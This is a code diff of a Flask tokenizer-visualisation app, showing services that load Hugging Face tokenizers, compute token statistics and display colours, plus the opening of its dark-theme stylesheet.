    ) -> Dict[str, Any]:
        """Tokenize in-memory text.

        Args:
            text: Input text to tokenize.
            model_id_or_name: Tokenizer model to use.
            is_preview: Whether this is a preview of a larger text.
            preview_char_limit: Character limit for preview.
            max_display_tokens: Maximum tokens to display.

        Returns:
            Dict containing display tokens, stats and tokenizer info.

        Raises:
            Exception: If the tokenizer fails to load.
        """
        tokenizer, tokenizer_info, error = tokenizer_service.load_tokenizer(model_id_or_name)

        if error:
            raise Exception(error)

        # Full-text tokenization drives the statistics.
        all_tokens = tokenizer.tokenize(text)
        total_token_count = len(all_tokens)

        # Display is limited to the preview slice (when previewing) and
        # capped at max_display_tokens.
        preview_text = text[:preview_char_limit] if is_preview else text
        preview_tokens = tokenizer.tokenize(preview_text)
        display_tokens = preview_tokens[:max_display_tokens]

        stats = stats_service.get_token_stats(all_tokens, text)

        token_data = stats_service.format_tokens_for_display(display_tokens, tokenizer)

        return {
            'tokens': token_data,
            'stats': stats,
            'display_limit_reached': total_token_count > max_display_tokens and not is_preview,
            'total_tokens': total_token_count,
            'is_full_file': False,
            'preview_only': is_preview,
            'tokenizer_info': tokenizer_info
        }

    @staticmethod
    def cleanup_file(file_path: str):
        """Safely remove a file if it exists; cleanup failures are ignored."""
        try:
            if os.path.exists(file_path):
                os.remove(file_path)
        except OSError:
            pass  # Ignore errors during cleanup


# Global instance
file_service = FileService()
app/services/stats_service.py ADDED
@@ -0,0 +1,98 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Stats Service - Handles token statistics and color generation
3
+ """
4
+ import hashlib
5
+ import math
6
+ from typing import List, Dict, Any
7
+
8
+
9
class StatsService:
    """Service for calculating token statistics and generating colors."""

    @staticmethod
    def get_varied_color(token: str) -> Dict[str, str]:
        """Derive a deterministic HSL background/text color pair from *token*.

        The hash-derived lightness is always 80-89, so the ``> 50`` branch
        always picks dark (20%) text; the other branch is kept for safety.
        """
        token_hash = hashlib.md5(token.encode()).hexdigest()
        hue = int(token_hash[:3], 16) % 360
        saturation = 70 + (int(token_hash[3:5], 16) % 20)
        lightness = 80 + (int(token_hash[5:7], 16) % 10)
        text_lightness = 20 if lightness > 50 else 90

        return {
            'background': f'hsl({hue}, {saturation}%, {lightness}%)',
            'text': f'hsl({hue}, {saturation}%, {text_lightness}%)'
        }

    @staticmethod
    def fix_token(token: str) -> str:
        """Fix token for display with improved space visualization.

        BPE tokenizers mark a leading space with 'Ġ'; each *leading* 'Ġ'
        is rendered as a middle dot.  Fix: the previous version counted
        every 'Ġ' in the token and stripped that many leading characters,
        corrupting tokens with a non-leading 'Ġ' — only the leading run
        is replaced now (identical output for ordinary tokens).
        """
        if token.startswith('Ġ'):
            leading = len(token) - len(token.lstrip('Ġ'))
            return '·' * leading + token[leading:]
        return token

    @staticmethod
    def get_token_stats(tokens: List[str], original_text: str) -> Dict[str, Any]:
        """Calculate enhanced statistics about *tokens*.

        Returns an empty dict for an empty token list; otherwise a dict
        with 'basic_stats' (counts, compression ratio, token-type tallies)
        and 'length_stats' (avg/std-dev/min/max/median token length).
        """
        if not tokens:
            return {}

        total_tokens = len(tokens)
        unique_tokens = len(set(tokens))
        avg_length = sum(len(t) for t in tokens) / total_tokens
        # Characters of input per produced token.
        compression_ratio = len(original_text) / total_tokens

        # Token type analysis ('Ġ' = leading space, 'Ċ' = newline in BPE vocab).
        space_tokens = sum(1 for t in tokens if t.startswith('Ġ'))
        newline_tokens = sum(1 for t in tokens if 'Ċ' in t)
        special_tokens = sum(1 for t in tokens if any(c in t for c in ['<', '>', '[', ']', '{', '}']))
        punctuation_tokens = sum(1 for t in tokens if any(c in t for c in '.,!?;:()'))

        # Length distribution (population standard deviation).
        lengths = [len(t) for t in tokens]
        mean_length = sum(lengths) / len(lengths)
        variance = sum((x - mean_length) ** 2 for x in lengths) / len(lengths)
        std_dev = math.sqrt(variance)

        return {
            'basic_stats': {
                'total_tokens': total_tokens,
                'unique_tokens': unique_tokens,
                'compression_ratio': round(compression_ratio, 2),
                'space_tokens': space_tokens,
                'newline_tokens': newline_tokens,
                'special_tokens': special_tokens,
                'punctuation_tokens': punctuation_tokens,
                'unique_percentage': round(unique_tokens/total_tokens * 100, 1)
            },
            'length_stats': {
                'avg_length': round(avg_length, 2),
                'std_dev': round(std_dev, 2),
                'min_length': min(lengths),
                'max_length': max(lengths),
                'median_length': sorted(lengths)[len(lengths)//2]
            }
        }

    @staticmethod
    def format_tokens_for_display(tokens: List[str], tokenizer) -> List[Dict[str, Any]]:
        """Format *tokens* for frontend display with colors and metadata.

        Each entry carries the original token, a display form (trailing
        'Ċ' stripped and flagged via 'newline'), its color pair, the
        numeric token id from *tokenizer*, and its index.
        """
        token_data = []
        for idx, token in enumerate(tokens):
            colors = StatsService.get_varied_color(token)
            fixed_token = StatsService.fix_token(token)
            # Numerical token ID from the tokenizer's vocabulary.
            token_id = tokenizer.convert_tokens_to_ids(token)
            token_data.append({
                'original': token,
                'display': fixed_token[:-1] if fixed_token.endswith('Ċ') else fixed_token,
                'colors': colors,
                'newline': fixed_token.endswith('Ċ'),
                'token_id': token_id,
                'token_index': idx
            })
        return token_data


# Global instance
stats_service = StatsService()
app/services/tokenizer_service.py ADDED
@@ -0,0 +1,182 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Tokenizer Service - Handles tokenizer loading, caching, and management
3
+ """
4
+ import time
5
+ from typing import Dict, Tuple, Optional, Any
6
+ from transformers import AutoTokenizer
7
+ from flask import current_app
8
+
9
+
10
+ class TokenizerService:
11
+ """Service for managing tokenizer loading and caching."""
12
+
13
+ # Predefined tokenizer models with aliases
14
+ TOKENIZER_MODELS = {
15
+ 'qwen3': {
16
+ 'name': 'Qwen/Qwen3-0.6B',
17
+ 'alias': 'Qwen 3'
18
+ },
19
+ 'gemma3-27b': {
20
+ 'name': 'google/gemma-3-27b-it',
21
+ 'alias': 'Gemma 3 27B'
22
+ },
23
+ 'glm4': {
24
+ 'name': 'THUDM/GLM-4-32B-0414',
25
+ 'alias': 'GLM 4'
26
+ },
27
+ 'mistral-small': {
28
+ 'name': 'mistralai/Mistral-Small-3.1-24B-Instruct-2503',
29
+ 'alias': 'Mistral Small 3.1'
30
+ },
31
+ 'llama4': {
32
+ 'name': 'meta-llama/Llama-4-Scout-17B-16E-Instruct',
33
+ 'alias': 'Llama 4'
34
+ },
35
+ 'deepseek-r1': {
36
+ 'name': 'deepseek-ai/DeepSeek-R1',
37
+ 'alias': 'Deepseek R1'
38
+ },
39
+ 'qwen_25_72b': {
40
+ 'name': 'Qwen/Qwen2.5-72B-Instruct',
41
+ 'alias': 'QWQ 32B'
42
+ },
43
+ 'llama_33': {
44
+ 'name': 'unsloth/Llama-3.3-70B-Instruct-bnb-4bit',
45
+ 'alias': 'Llama 3.3 70B'
46
+ },
47
+ 'gemma2_2b': {
48
+ 'name': 'google/gemma-2-2b-it',
49
+ 'alias': 'Gemma 2 2B'
50
+ },
51
+ 'bert-large-uncased': {
52
+ 'name': 'google-bert/bert-large-uncased',
53
+ 'alias': 'Bert Large Uncased'
54
+ },
55
+ 'gpt2': {
56
+ 'name': 'openai-community/gpt2',
57
+ 'alias': 'GPT-2'
58
+ }
59
+ }
60
+
61
+ def __init__(self):
62
+ """Initialize the tokenizer service with empty caches."""
63
+ self.tokenizers: Dict[str, Any] = {}
64
+ self.custom_tokenizers: Dict[str, Tuple[Any, float]] = {}
65
+ self.tokenizer_info_cache: Dict[str, Dict] = {}
66
+ self.custom_model_errors: Dict[str, str] = {}
67
+
68
+ def get_tokenizer_info(self, tokenizer) -> Dict:
69
+ """Extract useful information from a tokenizer."""
70
+ info = {}
71
+ try:
72
+ # Get vocabulary size (dictionary size)
73
+ if hasattr(tokenizer, 'vocab_size'):
74
+ info['vocab_size'] = tokenizer.vocab_size
75
+ elif hasattr(tokenizer, 'get_vocab'):
76
+ info['vocab_size'] = len(tokenizer.get_vocab())
77
+
78
+ # Get model max length if available
79
+ if hasattr(tokenizer, 'model_max_length') and tokenizer.model_max_length < 1000000:
80
+ info['model_max_length'] = tokenizer.model_max_length
81
+
82
+ # Check tokenizer type
83
+ info['tokenizer_type'] = tokenizer.__class__.__name__
84
+
85
+ # Get special tokens
86
+ special_tokens = {}
87
+ for token_name in ['pad_token', 'eos_token', 'bos_token', 'sep_token', 'cls_token', 'unk_token', 'mask_token']:
88
+ if hasattr(tokenizer, token_name) and getattr(tokenizer, token_name) is not None:
89
+ token_value = getattr(tokenizer, token_name)
90
+ if token_value and str(token_value).strip():
91
+ special_tokens[token_name] = str(token_value)
92
+
93
+ info['special_tokens'] = special_tokens
94
+
95
+ except Exception as e:
96
+ info['error'] = f"Error extracting tokenizer info: {str(e)}"
97
+
98
+ return info
99
+
100
+ def load_tokenizer(self, model_id_or_name: str) -> Tuple[Optional[Any], Dict, Optional[str]]:
101
+ """
102
+ Load tokenizer if not already loaded.
103
+
104
+ Returns:
105
+ Tuple of (tokenizer, tokenizer_info, error_message)
106
+ """
107
+ error_message = None
108
+ tokenizer_info = {}
109
+
110
+ # Check if we have cached tokenizer info
111
+ if model_id_or_name in self.tokenizer_info_cache:
112
+ tokenizer_info = self.tokenizer_info_cache[model_id_or_name]
113
+
114
+ try:
115
+ # Check if it's a predefined model ID
116
+ if model_id_or_name in self.TOKENIZER_MODELS:
117
+ model_name = self.TOKENIZER_MODELS[model_id_or_name]['name']
118
+ if model_id_or_name not in self.tokenizers:
119
+ self.tokenizers[model_id_or_name] = AutoTokenizer.from_pretrained(model_name)
120
+ tokenizer = self.tokenizers[model_id_or_name]
121
+
122
+ # Get tokenizer info if not already cached
123
+ if model_id_or_name not in self.tokenizer_info_cache:
124
+ tokenizer_info = self.get_tokenizer_info(tokenizer)
125
+ self.tokenizer_info_cache[model_id_or_name] = tokenizer_info
126
+
127
+ return tokenizer, tokenizer_info, None
128
+
129
+ # It's a custom model path
130
+ # Check if we have it in the custom cache and it's not expired
131
+ current_time = time.time()
132
+ cache_expiration = current_app.config.get('CACHE_EXPIRATION', 3600)
133
+
134
+ if model_id_or_name in self.custom_tokenizers:
135
+ cached_tokenizer, timestamp = self.custom_tokenizers[model_id_or_name]
136
+ if current_time - timestamp < cache_expiration:
137
+ # Get tokenizer info if not already cached
138
+ if model_id_or_name not in self.tokenizer_info_cache:
139
+ tokenizer_info = self.get_tokenizer_info(cached_tokenizer)
140
+ self.tokenizer_info_cache[model_id_or_name] = tokenizer_info
141
+ return cached_tokenizer, tokenizer_info, None
142
+
143
+ # Not in cache or expired, load it
144
+ tokenizer = AutoTokenizer.from_pretrained(model_id_or_name)
145
+ # Store in cache with timestamp
146
+ self.custom_tokenizers[model_id_or_name] = (tokenizer, current_time)
147
+ # Clear any previous errors for this model
148
+ if model_id_or_name in self.custom_model_errors:
149
+ del self.custom_model_errors[model_id_or_name]
150
+
151
+ # Get tokenizer info
152
+ tokenizer_info = self.get_tokenizer_info(tokenizer)
153
+ self.tokenizer_info_cache[model_id_or_name] = tokenizer_info
154
+
155
+ return tokenizer, tokenizer_info, None
156
+
157
+ except Exception as e:
158
+ error_message = f"Failed to load tokenizer: {str(e)}"
159
+ # Store error for future reference
160
+ self.custom_model_errors[model_id_or_name] = error_message
161
+ return None, tokenizer_info, error_message
162
+
163
+ def get_model_alias(self, model_id: str) -> str:
164
+ """Get the display alias for a model ID."""
165
+ if model_id in self.TOKENIZER_MODELS:
166
+ return self.TOKENIZER_MODELS[model_id]['alias']
167
+ return model_id
168
+
169
+ def is_predefined_model(self, model_id: str) -> bool:
170
+ """Check if a model ID is a predefined model."""
171
+ return model_id in self.TOKENIZER_MODELS
172
+
173
+ def clear_cache(self):
174
+ """Clear all caches."""
175
+ self.tokenizers.clear()
176
+ self.custom_tokenizers.clear()
177
+ self.tokenizer_info_cache.clear()
178
+ self.custom_model_errors.clear()
179
+
180
+
181
+ # Global instance
182
+ tokenizer_service = TokenizerService()
app/static/css/style.css ADDED
@@ -0,0 +1,1298 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ :root {
2
+ --primary-color: #0f4f9b; /* Blue accent */
3
+ --primary-hover: #0c3e7a; /* Darker blue accent */
4
+ --bg-color: #121212; /* Dark background */
5
+ --card-bg: #1e1e1e; /* Dark card background */
6
+ --card-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.7),
7
+ 0 2px 4px -1px rgba(0, 0, 0, 0.6);
8
+ --transition: all 0.3s ease;
9
+ --text-color: #E0E0E0; /* Main text color */
10
+ --secondary-text: #A0A0A0;/* Secondary text color */
11
+ --input-bg: #2a2a2a; /* Input/textarea background */
12
+ --input-border: #444444; /* Input/textarea border */
13
+ --input-focus: #0f4f9b; /* Focus border color */
14
+ }
15
+
16
+ * {
17
+ margin: 0;
18
+ padding: 0;
19
+ box-sizing: border-box;
20
+ font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
21
+ scrollbar-width: thin;
22
+ scrollbar-color: #0f4f9b #121212
23
+ }
24
+
25
+ /* Width and height of the scrollbar */
26
+ ::-webkit-scrollbar {
27
+ width: 12px;
28
+ height: 12px;
29
+ }
30
+
31
+ @keyframes spin {
32
+ from { transform: rotate(0deg); }
33
+ to { transform: rotate(360deg); }
34
+ }
35
+
36
+ /* Loading spinner styles */
37
+ .loading-spinner {
38
+ display: inline-block;
39
+ width: 20px;
40
+ height: 20px;
41
+ border: 2px solid rgba(255, 255, 255, 0.3);
42
+ border-radius: 50%;
43
+ border-top-color: #fff;
44
+ animation: spin 1s linear infinite;
45
+ margin-left: 8px;
46
+ vertical-align: middle;
47
+ }
48
+
49
+ .loading-spinner.large {
50
+ width: 40px;
51
+ height: 40px;
52
+ border-width: 3px;
53
+ }
54
+
55
+ .loading-overlay {
56
+ position: fixed;
57
+ top: 0;
58
+ left: 0;
59
+ width: 100%;
60
+ height: 100%;
61
+ background-color: rgba(18, 18, 18, 0.8);
62
+ display: flex;
63
+ justify-content: center;
64
+ align-items: center;
65
+ z-index: 9999;
66
+ opacity: 0;
67
+ visibility: hidden;
68
+ transition: opacity 0.3s ease, visibility 0.3s ease;
69
+ }
70
+
71
+ .loading-overlay.active {
72
+ opacity: 1;
73
+ visibility: visible;
74
+ }
75
+
76
+ .loading-content {
77
+ background-color: var(--card-bg);
78
+ padding: 2rem;
79
+ border-radius: 1rem;
80
+ box-shadow: var(--card-shadow);
81
+ text-align: center;
82
+ min-width: 200px;
83
+ }
84
+
85
+ .loading-text {
86
+ color: var(--text-color);
87
+ font-size: 1.1rem;
88
+ margin-top: 1rem;
89
+ }
90
+
91
+ /* Keyboard shortcut indicator */
92
+ .keyboard-shortcut-hint {
93
+ position: absolute;
94
+ top: 10px;
95
+ right: 10px;
96
+ background: rgba(15, 79, 155, 0.1);
97
+ color: var(--primary-color);
98
+ font-size: 0.8rem;
99
+ padding: 0.25rem 0.5rem;
100
+ border-radius: 0.375rem;
101
+ border: 1px solid rgba(15, 79, 155, 0.2);
102
+ pointer-events: none;
103
+ opacity: 0.7;
104
+ font-family: monospace;
105
+ }
106
+
107
+ .input-section {
108
+ position: relative;
109
+ }
110
+
111
+ /* Card header styles */
112
+ .card-header {
113
+ display: flex;
114
+ align-items: center;
115
+ justify-content: space-between;
116
+ margin-bottom: 1.25rem;
117
+ }
118
+
119
+ .card-header .card-title {
120
+ margin-bottom: 0;
121
+ }
122
+
123
+ /* Token search styles */
124
+ .search-toggle-btn {
125
+ background: var(--primary-color);
126
+ color: white;
127
+ border: none;
128
+ border-radius: 50%;
129
+ width: 36px;
130
+ height: 36px;
131
+ min-width: 36px;
132
+ min-height: 36px;
133
+ display: flex;
134
+ align-items: center;
135
+ justify-content: center;
136
+ cursor: pointer;
137
+ transition: var(--transition);
138
+ box-shadow: 0 2px 4px rgba(15, 79, 155, 0.3);
139
+ padding: 0;
140
+ flex-shrink: 0;
141
+ }
142
+
143
+ .search-toggle-btn:hover {
144
+ background-color: var(--primary-hover);
145
+ transform: translateY(-1px);
146
+ box-shadow: 0 4px 8px rgba(15, 79, 155, 0.4);
147
+ }
148
+
149
+ .search-toggle-btn.active {
150
+ background-color: var(--primary-hover);
151
+ box-shadow: 0 2px 8px rgba(15, 79, 155, 0.5);
152
+ }
153
+
154
+ .search-toggle-btn svg {
155
+ width: 18px;
156
+ height: 18px;
157
+ fill: currentColor;
158
+ flex-shrink: 0;
159
+ }
160
+
161
+ .token-search-container {
162
+ display: none;
163
+ flex-direction: column;
164
+ gap: 1rem;
165
+ margin-bottom: 1.5rem;
166
+ padding: 1.25rem;
167
+ background-color: rgba(15, 79, 155, 0.1);
168
+ border-radius: 0.75rem;
169
+ border: 1px solid rgba(15, 79, 155, 0.2);
170
+ opacity: 0;
171
+ transform: translateY(-10px);
172
+ transition: opacity 0.3s ease, transform 0.3s ease;
173
+ width: 100%;
174
+ }
175
+
176
+ .token-search-container.show {
177
+ display: flex;
178
+ opacity: 1;
179
+ transform: translateY(0);
180
+ }
181
+
182
+ .token-search-row {
183
+ display: flex;
184
+ align-items: center;
185
+ gap: 1rem;
186
+ width: 100%;
187
+ }
188
+
189
+ @keyframes slideDown {
190
+ from {
191
+ opacity: 0;
192
+ transform: translateY(-10px);
193
+ }
194
+ to {
195
+ opacity: 1;
196
+ transform: translateY(0);
197
+ }
198
+ }
199
+
200
+ .token-search-input {
201
+ flex: 1;
202
+ padding: 0.875rem 1rem;
203
+ border: 2px solid var(--input-border);
204
+ border-radius: 0.5rem;
205
+ background-color: var(--input-bg);
206
+ color: var(--text-color);
207
+ font-size: 1rem;
208
+ transition: var(--transition);
209
+ min-width: 0;
210
+ }
211
+
212
+ .token-search-input:focus {
213
+ outline: none;
214
+ border-color: var(--primary-color);
215
+ box-shadow: 0 0 0 3px rgba(15, 79, 155, 0.1);
216
+ }
217
+
218
+ .token-search-controls {
219
+ display: flex;
220
+ align-items: center;
221
+ gap: 0.75rem;
222
+ flex-shrink: 0;
223
+ }
224
+
225
+ .token-search-btn {
226
+ padding: 0.5rem 1rem;
227
+ background: var(--primary-color);
228
+ color: white;
229
+ border: none;
230
+ border-radius: 0.5rem;
231
+ font-size: 0.875rem;
232
+ font-weight: 500;
233
+ cursor: pointer;
234
+ transition: var(--transition);
235
+ box-shadow: 0 1px 3px rgba(15, 79, 155, 0.3);
236
+ min-width: 44px;
237
+ }
238
+
239
+ .token-search-btn:hover {
240
+ background: var(--primary-hover);
241
+ transform: translateY(-1px);
242
+ box-shadow: 0 2px 6px rgba(15, 79, 155, 0.4);
243
+ }
244
+
245
+ .token-search-btn:disabled {
246
+ opacity: 0.5;
247
+ cursor: not-allowed;
248
+ transform: none;
249
+ }
250
+
251
+ .token-search-count {
252
+ color: var(--text-color);
253
+ font-size: 0.875rem;
254
+ font-weight: 500;
255
+ white-space: nowrap;
256
+ background-color: rgba(255, 255, 255, 0.1);
257
+ padding: 0.5rem 0.75rem;
258
+ border-radius: 0.375rem;
259
+ min-width: 60px;
260
+ text-align: center;
261
+ }
262
+
263
+ /* Highlighted token styles */
264
+ .token.highlighted {
265
+ background-color: #fbbf24 !important;
266
+ color: #1f2937 !important;
267
+ box-shadow: 0 0 0 2px #f59e0b;
268
+ z-index: 1;
269
+ position: relative;
270
+ }
271
+
272
+ .token.highlighted.current {
273
+ background-color: #f59e0b !important;
274
+ color: white !important;
275
+ box-shadow: 0 0 0 3px #f59e0b;
276
+ }
277
+
278
+ /* Token frequency chart styles */
279
+ .frequency-chart-container {
280
+ margin-top: 1.5rem;
281
+ padding: 1rem;
282
+ background-color: rgba(15, 79, 155, 0.05);
283
+ border-radius: 0.5rem;
284
+ border: 1px solid rgba(15, 79, 155, 0.1);
285
+ }
286
+
287
+ .frequency-chart-title {
288
+ font-size: 1rem;
289
+ font-weight: 600;
290
+ color: var(--text-color);
291
+ margin-bottom: 1rem;
292
+ display: flex;
293
+ align-items: center;
294
+ gap: 0.5rem;
295
+ }
296
+
297
+ .frequency-chart {
298
+ display: flex;
299
+ flex-direction: column;
300
+ gap: 0.5rem;
301
+ }
302
+
303
+ .frequency-item {
304
+ display: flex;
305
+ align-items: center;
306
+ gap: 0.75rem;
307
+ padding: 0.5rem;
308
+ background-color: var(--input-bg);
309
+ border-radius: 0.375rem;
310
+ transition: var(--transition);
311
+ }
312
+
313
+ .frequency-item:hover {
314
+ background-color: rgba(255, 255, 255, 0.05);
315
+ }
316
+
317
+ .frequency-token {
318
+ font-family: 'SF Mono', 'Monaco', 'Inconsolata', 'Fira Mono', 'Droid Sans Mono', 'Source Code Pro', monospace;
319
+ font-size: 0.8rem;
320
+ background-color: rgba(15, 79, 155, 0.2);
321
+ color: var(--primary-color);
322
+ padding: 0.25rem 0.5rem;
323
+ border-radius: 0.25rem;
324
+ min-width: 60px;
325
+ text-align: center;
326
+ cursor: pointer;
327
+ transition: var(--transition);
328
+ }
329
+
330
+ .frequency-token:hover {
331
+ background-color: var(--primary-color);
332
+ color: white;
333
+ }
334
+
335
+ .frequency-bar-container {
336
+ flex: 1;
337
+ display: flex;
338
+ align-items: center;
339
+ gap: 0.5rem;
340
+ }
341
+
342
+ .frequency-bar {
343
+ flex: 1;
344
+ height: 20px;
345
+ background-color: rgba(255, 255, 255, 0.1);
346
+ border-radius: 10px;
347
+ overflow: hidden;
348
+ position: relative;
349
+ }
350
+
351
+ .frequency-bar-fill {
352
+ height: 100%;
353
+ background: linear-gradient(90deg, var(--primary-color) 0%, var(--primary-hover) 100%);
354
+ border-radius: 10px;
355
+ transition: width 0.5s ease;
356
+ position: relative;
357
+ }
358
+
359
+ .frequency-count {
360
+ color: var(--secondary-text);
361
+ font-size: 0.8rem;
362
+ font-weight: 500;
363
+ min-width: 40px;
364
+ text-align: right;
365
+ }
366
+
367
+ .chart-toggle-btn {
368
+ background: none;
369
+ border: 1px solid var(--primary-color);
370
+ color: var(--primary-color);
371
+ padding: 0.375rem 0.75rem;
372
+ border-radius: 0.375rem;
373
+ font-size: 0.8rem;
374
+ cursor: pointer;
375
+ transition: var(--transition);
376
+ box-shadow: none;
377
+ }
378
+
379
+ .chart-toggle-btn:hover {
380
+ background-color: var(--primary-color);
381
+ color: white;
382
+ transform: none;
383
+ box-shadow: none;
384
+ }
385
+
386
+ .chart-toggle-btn.active {
387
+ background-color: var(--primary-color);
388
+ color: white;
389
+ }
390
+
391
+ /* Track (background) */
392
+ ::-webkit-scrollbar-track {
393
+ background: #121212;
394
+ border-radius: 10px;
395
+ }
396
+
397
+ /* Handle (draggable part) */
398
+ ::-webkit-scrollbar-thumb {
399
+ background: #0f4f9b;
400
+ border-radius: 10px;
401
+ border: 2px solid #121212;
402
+ }
403
+
404
+ /* Handle on hover */
405
+ ::-webkit-scrollbar-thumb:hover {
406
+ background: #0c3e7a;
407
+ }
408
+
409
+
410
+ body {
411
+ background-color: var(--bg-color);
412
+ padding: 2rem;
413
+ min-height: 100vh;
414
+ background-image:
415
+ radial-gradient(circle at 20% 20%, rgba(15, 79, 155, 0.1) 0%, transparent 50%),
416
+ radial-gradient(circle at 80% 80%, rgba(15, 79, 155, 0.1) 0%, transparent 50%);
417
+ color: var(--text-color);
418
+ }
419
+
420
+ .container {
421
+ max-width: 1200px;
422
+ margin: 0 auto;
423
+ }
424
+
425
+ .header {
426
+ display: flex;
427
+ justify-content: space-between;
428
+ align-items: center;
429
+ margin-bottom: 2rem;
430
+ position: relative;
431
+ }
432
+
433
+ .title-section {
434
+ flex-grow: 1;
435
+ }
436
+
437
+ .title {
438
+ font-size: 2.5rem;
439
+ font-weight: 800;
440
+ color: var(--primary-color);
441
+ margin-bottom: 0.5rem;
442
+ }
443
